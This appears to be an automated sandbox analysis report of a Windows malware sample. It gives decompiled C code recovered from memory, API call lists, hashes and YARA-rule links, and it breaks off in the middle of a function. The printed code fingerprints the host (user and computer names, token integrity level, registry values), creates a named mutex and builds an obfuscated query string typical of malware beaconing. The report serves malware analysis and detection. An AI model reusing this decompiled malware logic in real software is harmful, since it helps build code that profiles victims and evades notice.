0x00000000

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 01374445
GetTickCount.KERNEL32 ref: 0137445C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 0137447C
SwitchToThread.KERNEL32(?,00000001), ref: 01374482
_aullrem.NTDLL(?,?,00000009,00000000), ref: 0137449E
Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 013744B8
IsWow64Process.KERNEL32(0000032C,?,?,00000001), ref: 013744D6

Strings

Tt, xrefs: 01374445

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
String ID: Tt
API String ID: 3690864001-3291821022
Opcode ID: 686e1c503ec48bfcaded97a17275cacd3286f8683608b3de295a9a9cc993bece
Instruction ID: 395d3b37f63d6812320e7453e5b75c956c739e22ec431853125432772e11e1e0
Opcode Fuzzy Hash: 686e1c503ec48bfcaded97a17275cacd3286f8683608b3de295a9a9cc993bece
Instruction Fuzzy Hash: 1821A2B2A04304AFD731AF68DC88B2E7BECBB44368F044A29F655D7140EB389804DB61

Uniqueness

Uniqueness Score: -1.00%

Function 013757AD, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E013757AD(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L01377F50();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x137a2d0; // 0x666d5a8
				_t5 = _t13 + 0x137b84d; // 0x79e8df5
				_t6 = _t13 + 0x137b580; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L01377C2A();
				_t17 = CreateFileMappingW(0xffffffff, 0x137a2d4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x013757ad
0x013757b5
0x013757b9
0x013757bf
0x013757c4
0x013757c9
0x013757cc
0x013757cf
0x013757d4
0x013757d5
0x013757d8
0x013757dd
0x013757e4
0x013757ee
0x013757f0
0x013757f1
0x013757f4
0x01375810
0x01375816
0x0137581a
0x01375868
0x0137581c
0x01375829
0x01375839
0x01375841
0x01375853
0x01375857
0x00000000
0x00000000
0x01375843
0x01375846
0x0137584b
0x0137584d
0x0137584d
0x0137582b
0x0137582d
0x01375859
0x0137585a
0x0137585a
0x01375829
0x0137586f

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,01372DF9,?,00000001,?), ref: 013757B9
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 013757CF
_snwprintf.NTDLL ref: 013757F4
CreateFileMappingW.KERNELBASE(000000FF,0137A2D4,00000004,00000000,00001000,?), ref: 01375810
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,01372DF9,?), ref: 01375822
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 01375839
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,01372DF9), ref: 0137585A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,01372DF9,?), ref: 01375862

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 39ba6d798ec7b2ff4e28b0a8320292cd64c8d3b59ac8d9d29de8c11f3ccc4c90
Instruction ID: e10b32da80c2071e41e8abed1a23ed0a98c199d86fcfaa3584dca3e40afe7682
Opcode Fuzzy Hash: 39ba6d798ec7b2ff4e28b0a8320292cd64c8d3b59ac8d9d29de8c11f3ccc4c90
Instruction Fuzzy Hash: A0218E72A01208BBD7359B68CC09F9D7BBDAB48768F280125FA05EB1C5EA7499048B50

Uniqueness

Uniqueness Score: -1.00%

Function 01372D63, Relevance: 10.7, APIs: 7, Instructions: 191
memoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E01372D63(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t41;
				long _t47;
				long _t48;
				void* _t53;
				void* _t55;
				intOrPtr _t63;
				void* _t66;
				long _t70;
				void* _t71;
				signed char _t73;
				intOrPtr _t75;
				signed int _t76;
				long _t81;
				long _t83;
				CHAR* _t86;
				void* _t87;

				_t78 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E01375901();
				if(_t27 != 0) {
					_t76 =  *0x137a2b4; // 0x4000000a
					_t72 = (_t76 & 0xf0000000) + _t27;
					 *0x137a2b4 = (_t76 & 0xf0000000) + _t27;
				}
				_t28 =  *0x137a14c(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E01374097( &_v8,  &_v16); // executed
					_push(0);
					_t83 = _t31;
					_t32 =  *0x137a2d0; // 0x666d5a8
					_push(0x137a2d8);
					_push(1);
					_t7 = _t32 + 0x137b5bc; // 0x4d283a53
					 *0x137a2d4 = 0xc;
					 *0x137a2dc = 0;
					L01375EC2();
					_t36 = E013757AD(_t78,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t83 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E01373946(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t86 = E01375C4E(0x27);
							__eflags = _t86;
							if(_t86 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t63 =  *0x137a2d0; // 0x666d5a8
								_t18 = _t63 + 0x137b916; // 0x78383025
								wsprintfA(_t86, _t18, _v40, _v36, _v32, _v28);
								_t87 = _t87 + 0x18;
							}
							 *0x137a328 = _t86;
						}
						_t38 = E01372304();
						 *0x137a2c8 =  *0x137a2c8 ^ 0xe8fa7dd7;
						 *0x137a318 = _t38;
						_t39 = E01375C4E(0x60);
						__eflags = _t39;
						 *0x137a37c = _t39;
						if(_t39 == 0) {
							_t83 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t53 =  *0x137a37c; // 0x79e9630
							_t87 = _t87 + 0xc;
							__imp__(_t53 + 0x40);
							_t55 =  *0x137a37c; // 0x79e9630
							 *_t55 = 0x137b882;
							_t83 = 0;
						}
						__eflags = _t83;
						if(_t83 == 0) {
							_t41 = RtlAllocateHeap( *0x137a290, _t83, 0x52);
							__eflags = _t41;
							 *0x137a310 = _t41;
							if(_t41 == 0) {
								_t83 = 8;
							} else {
								_t73 =  *0x137a2b4; // 0x4000000a
								_t78 = _t73 & 0x000000ff;
								_t75 =  *0x137a2d0; // 0x666d5a8
								_t19 = _t75 + 0x137b212; // 0x697a6f4d
								_t72 = _t19;
								wsprintfA(_t41, _t19, _t73 & 0x000000ff, _t73 & 0x000000ff, 0x13792c7);
							}
							__eflags = _t83;
							if(_t83 == 0) {
								asm("sbb eax, eax");
								E01373946( ~_v8 &  *0x137a2c8, 0x137a00c); // executed
								_t83 = E0137374B(_t72);
								__eflags = _t83;
								if(_t83 != 0) {
									goto L31;
								}
								_t47 = E01373E8F(_t72); // executed
								__eflags = _t47;
								if(_t47 != 0) {
									__eflags = _v8;
									_t81 = _v12;
									if(_v8 != 0) {
										L30:
										_t48 = E01371B47(_t78, _t81, _v8); // executed
										_t83 = _t48;
										goto L31;
									}
									__eflags = _t81;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t81 + 4; // 0x5
									_t83 = E01375D26(__eflags, _t23);
									__eflags = _t83;
									if(_t83 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t83 = 8;
							}
						}
					} else {
						_t70 = _v12;
						if(_t70 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								E0137A150();
							}
							goto L35;
						}
						_t71 = _t70 + 4;
						do {
							_push(1);
							_push(_t71);
							_t66 = 5;
						} while (E013763CD(_t66, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t83 = _t28;
					L35:
					return _t83;
				}
			}

0x01372d63
0x01372d6e
0x01372d71
0x01372d74
0x01372d77
0x01372d7e
0x01372d80
0x01372d8c
0x01372d8e
0x01372d8e
0x01372d97
0x01372d9f
0x01372da2
0x01372dbc
0x01372dc1
0x01372dc2
0x01372dc4
0x01372dc9
0x01372dce
0x01372dd0
0x01372dd7
0x01372de1
0x01372de7
0x01372df4
0x01372dfb
0x01372e00
0x01372e00
0x01372e09
0x01372e32
0x01372e35
0x01372e42
0x01372e49
0x01372e55
0x01372e57
0x01372e59
0x01372e5e
0x01372e64
0x01372e6a
0x01372e70
0x01372e73
0x01372e78
0x01372e80
0x01372e82
0x01372e82
0x01372e85
0x01372e85
0x01372e8b
0x01372e90
0x01372e98
0x01372e9d
0x01372ea2
0x01372ea4
0x01372ea9
0x01372ed8
0x01372eab
0x01372eb0
0x01372eb5
0x01372eba
0x01372ec1
0x01372ec7
0x01372ecc
0x01372ed2
0x01372ed2
0x01372ed9
0x01372edb
0x01372eea
0x01372ef0
0x01372ef2
0x01372ef7
0x01372f23
0x01372ef9
0x01372ef9
0x01372eff
0x01372f0c
0x01372f12
0x01372f12
0x01372f1a
0x01372f1c
0x01372f24
0x01372f26
0x01372f2d
0x01372f3a
0x01372f44
0x01372f46
0x01372f48
0x00000000
0x00000000
0x01372f4a
0x01372f4f
0x01372f51
0x01372f58
0x01372f5c
0x01372f5f
0x01372f74
0x01372f78
0x01372f7d
0x00000000
0x01372f7d
0x01372f61
0x01372f63
0x00000000
0x00000000
0x01372f65
0x01372f6e
0x01372f70
0x01372f72
0x00000000
0x00000000
0x00000000
0x01372f72
0x01372f55
0x01372f55
0x01372f26
0x01372e0b
0x01372e0b
0x01372e10
0x01372f7f
0x01372f83
0x01372f8b
0x01372f8b
0x00000000
0x01372f83
0x01372e16
0x01372e19
0x01372e19
0x01372e1b
0x01372e1e
0x01372e26
0x01372e2d
0x00000000
0x01372f93
0x01372f93
0x01372f96
0x01372f9b
0x01372f9b

APIs

Part of subcall function 01375901: GetModuleHandleA.KERNEL32(4C44544E,00000000,01372D7C,00000000,00000000,00000000,?,?,?,?,?,013744F9,?,00000001), ref: 01375910

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,0137A2D8,00000000), ref: 01372DE7
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,013744F9,?,00000001), ref: 01372E00
wsprintfA.USER32 ref: 01372E80
memset.NTDLL ref: 01372EB0
RtlInitializeCriticalSection.NTDLL(079E95F0), ref: 01372EC1
RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 01372EEA
wsprintfA.USER32 ref: 01372F1A

Part of subcall function 01373946: GetUserNameW.ADVAPI32(00000000,01372F3F), ref: 0137397D
Part of subcall function 01373946: RtlAllocateHeap.NTDLL(00000000,01372F3F), ref: 01373994
Part of subcall function 01373946: GetUserNameW.ADVAPI32(00000000,01372F3F), ref: 013739A1
Part of subcall function 01373946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,01372F3F,?,?,?,?,?,013744F9,?,00000001), ref: 013739C2
Part of subcall function 01373946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 013739E9
Part of subcall function 01373946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 013739FD
Part of subcall function 01373946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 01373A0A
Part of subcall function 01373946: HeapFree.KERNEL32(00000000,00000000), ref: 01373A28

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID:
API String ID: 2910951584-0
Opcode ID: 02cc63bc87cfd4f6f9590a43519660eb17a7a2a8cb76dd6c3dec7f1cd1171b1b
Instruction ID: 39eb1062481f63919eecc2636b5c4882b6a56992008acc70f6716a1c8d4a3900
Opcode Fuzzy Hash: 02cc63bc87cfd4f6f9590a43519660eb17a7a2a8cb76dd6c3dec7f1cd1171b1b
Instruction Fuzzy Hash: 1251E471900219ABEB35DFACDC88FAFB7FCAB14718F180519E909E7244E7799944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01371041, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01371041(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x137a2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E01375C4E(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E01372A03(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x0137104e
0x01371055
0x0137105c
0x01371070
0x0137107b
0x01371093
0x013710a0
0x013710a3
0x013710a8
0x013710b3
0x013710b7
0x013710c6
0x013710ca
0x013710e6
0x013710e6
0x013710ea
0x013710ea
0x013710ef
0x013710f3
0x013710f9
0x013710fa
0x01371101
0x01371107

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01371073
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 01371093
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 013710A3
CloseHandle.KERNEL32(00000000), ref: 013710F3

Part of subcall function 01375C4E: RtlAllocateHeap.NTDLL(00000000,00000000,01373FAA), ref: 01375C5A

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 013710C6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 013710CE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 013710DE

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 17da7370392e813a457baf4e081e20ab8b5f19cb542eada26ef546213b4fa3e6
Instruction ID: 8bb201a55037ebe2939586b4d2c1c3a7a71804cda4ffd3799f4493948f708c6d
Opcode Fuzzy Hash: 17da7370392e813a457baf4e081e20ab8b5f19cb542eada26ef546213b4fa3e6
Instruction Fuzzy Hash: CC213C75900259FFEB319F94DC44EEEBFBDFB04304F040065E611A6150DB755A44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0137274E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E0137274E(void* __ecx, signed char* _a4) {
				signed int _v8;
				void* _v12;
				void* _t13;
				signed short _t16;
				signed int _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				signed short* _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr* _t31;

				_t31 = __imp__;
				_t23 = 0;
				_v8 = 1;
				_t28 = 0x137a380;
				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
				while(1) {
					_t13 = E01374E9C(_a4,  &_v12); // executed
					if(_t13 == 0) {
						break;
					}
					_push(_v12);
					_t19 = 0xd;
					_t20 = E013733FA(_t19);
					if(_t20 == 0) {
						HeapFree( *0x137a290, 0, _v12);
						break;
					} else {
						 *_t28 = _t20;
						_t28 = _t28 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					 *_t31(1);
					if(_v8 != 0) {
						_t26 =  *0x137a388; // 0x79e9c80
						_t16 =  *_t26 & 0x0000ffff;
						if(_t16 < 0x61 || _t16 > 0x7a) {
							_t17 = _t16 & 0x0000ffff;
						} else {
							_t17 = (_t16 & 0x0000ffff) - 0x20;
						}
						 *_t26 = _t17;
					}
					return _v8;
				}
				_v8 = _v8 & 0x00000000;
				goto L7;
			}

0x01372755
0x0137275c
0x0137275f
0x01372766
0x0137276b
0x0137276d
0x01372774
0x0137277b
0x00000000
0x00000000
0x0137277d
0x01372782
0x01372783
0x0137278a
0x013727a4
0x00000000
0x0137278c
0x0137278c
0x0137278e
0x01372791
0x01372795
0x00000000
0x00000000
0x01372797
0x01372795
0x013727ae
0x013727b0
0x013727b6
0x013727b8
0x013727be
0x013727c5
0x013727d5
0x013727cd
0x013727d0
0x013727d0
0x013727d8
0x013727d8
0x013727e2
0x013727e2
0x013727aa
0x00000000

APIs

Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0137276B

Part of subcall function 01374E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3,0137A380), ref: 01374EC7
Part of subcall function 01374E9C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 01374EE9
Part of subcall function 01374E9C: memset.NTDLL ref: 01374F03
Part of subcall function 01374E9C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 01374F41
Part of subcall function 01374E9C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01374F55
Part of subcall function 01374E9C: CloseHandle.KERNEL32(?), ref: 01374F6C
Part of subcall function 01374E9C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 01374F78
Part of subcall function 01374E9C: lstrcat.KERNEL32(?,642E2A5C), ref: 01374FB9
Part of subcall function 01374E9C: FindFirstFileA.KERNELBASE(?,?), ref: 01374FCF

Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 013727B0

Part of subcall function 013733FA: lstrlen.KERNEL32(?,0137A380,74E47FC0,00000000,01372788,?,?,?,?,?,01373EAC,?), ref: 01373403
Part of subcall function 013733FA: mbstowcs.NTDLL ref: 0137342A
Part of subcall function 013733FA: memset.NTDLL ref: 0137343C

HeapFree.KERNEL32(00000000,?,?,?,?,?,?,01373EAC,?), ref: 013727A4

Strings

Ut, xrefs: 013727A4

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Wow64$FileHeap$AllocateEnableRedirectionmemset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
String ID: Ut
API String ID: 94831996-8415677
Opcode ID: 01c2778636f06308bd568d5c7b02f3340ff53a8b23831e6653257c95c9cf3f64
Instruction ID: ecbc1cb204fbe049f3bfe1e268370321ca0bec2b6f65da323d64af2ddb27f2f6
Opcode Fuzzy Hash: 01c2778636f06308bd568d5c7b02f3340ff53a8b23831e6653257c95c9cf3f64
Instruction Fuzzy Hash: 94110835610258EFE7309F99CD80BAEBBBCEB0432DF540021E501E7181D3799981DB20

Uniqueness

Uniqueness Score: -1.00%

Function 0137779E, Relevance: 4.6, APIs: 3, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0137779E(void* __ecx, void* __eflags) {
				char _v8;
				void* _v12;
				int _v16;
				int _v20;
				intOrPtr _t15;
				intOrPtr _t19;
				long _t24;
				long _t29;
				short* _t31;
				short* _t34;

				_t15 =  *0x137a2d0; // 0x666d5a8
				_v8 = _v8 & 0x00000000;
				_t3 = _t15 + 0x137ba60; // 0x4f0053
				_v16 = 4;
				_t31 = E01374C7C(__ecx, _t3);
				if(_t31 != 0) {
					_t19 =  *0x137a2d0; // 0x666d5a8
					_t5 = _t19 + 0x137babc; // 0x6e0049
					_t34 = E01374C7C(__ecx, _t5);
					if(_t34 != 0) {
						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
						if(_t24 == 0) {
							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
							if(_t29 != 0) {
								_v8 = _v8 & 0x00000000;
							}
							RegCloseKey(_v12);
						}
						E01372A03(_t34);
					}
					E01372A03(_t31);
				}
				return _v8;
			}

0x013777a4
0x013777a9
0x013777ae
0x013777b5
0x013777c1
0x013777c5
0x013777c7
0x013777cd
0x013777d9
0x013777dd
0x013777f0
0x013777f8
0x0137780c
0x01377814
0x01377816
0x01377816
0x0137781d
0x0137781d
0x01377824
0x01377824
0x0137782a
0x0137782f
0x01377835

APIs

Part of subcall function 01374C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,013777C1,004F0053,00000000,?), ref: 01374C85
Part of subcall function 01374C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,013777C1,004F0053,00000000,?), ref: 01374CAF
Part of subcall function 01374C7C: memset.NTDLL ref: 01374CC3

RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 013777F0
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 0137780C
RegCloseKey.ADVAPI32(00000000), ref: 0137781D

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValuelstrlenmemcpymemset
String ID:
API String ID: 830012212-0
Opcode ID: 3f4c2c805acc8496a45e2884e8e9f32957faccf0d0169d40f3c1e412abceda7f
Instruction ID: 313ec49ef2eccde8e13c5ab04e9c39e6fa0babcb3d0446ac65947d9c2e3f0976
Opcode Fuzzy Hash: 3f4c2c805acc8496a45e2884e8e9f32957faccf0d0169d40f3c1e412abceda7f
Instruction Fuzzy Hash: 5A11217290020ABBEB31EBD8DD89FAEBBFCAB04709F144459A601E7055EB749A048B50

Uniqueness

Uniqueness Score: -1.00%

Function 013741D0, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x137a294) == 0) {
						E01371547();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x137a294) == 1) {
						_t10 = E01374430(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}

0x013741d7
0x013741d8
0x013741db
0x0137420d
0x0137420f
0x0137420f
0x013741dd
0x013741de
0x013741f3
0x013741fa
0x013741fc
0x013741fc
0x013741fa
0x013741de
0x01374217

APIs

InterlockedIncrement.KERNEL32(0137A294), ref: 013741E5

Part of subcall function 01374430: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 01374445

InterlockedDecrement.KERNEL32(0137A294), ref: 01374205

Memory Dump Source

Source File: 00000004.00000002.706931380.0000000001371000.00000020.00020000.sdmp, Offset: 01370000, based on PE: true

Associated: 00000004.00000002.706919366.0000000001370000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706949398.0000000001379000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.706955867.000000000137A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.706982868.000000000137C000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: b16f6e1d852de4e481b86a0a58fa140d87950fd718e49f880bfbcab05dd0d254
Instruction ID: ca2c08aa539d383861f5cb3f12c48051c2cb78f6e4126612144984ce86b7c406
Opcode Fuzzy Hash: b16f6e1d852de4e481b86a0a58fa140d87950fd718e49f880bfbcab05dd0d254
Instruction Fuzzy Hash: AEE086312D413797D633166D9808B9EAB54BF05F9CF040118F949E1055F62CE461C7F1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01376124, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E01376124(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x137a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x137a018; // 0xa6c26295
					asm("bswap eax");
					_t32 =  *0x137a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x137a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x137a00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0x137a2d0; // 0x666d5a8
					_t2 = _t35 + 0x137b622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d14c, _t34, _t33, _t32, _t31,  *0x137a02c,  *0x137a004, _t110);
					_t38 = E0137271A();
					_t39 =  *0x137a2d0; // 0x666d5a8
					_t3 = _t39 + 0x137b662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x137a2d0; // 0x666d5a8
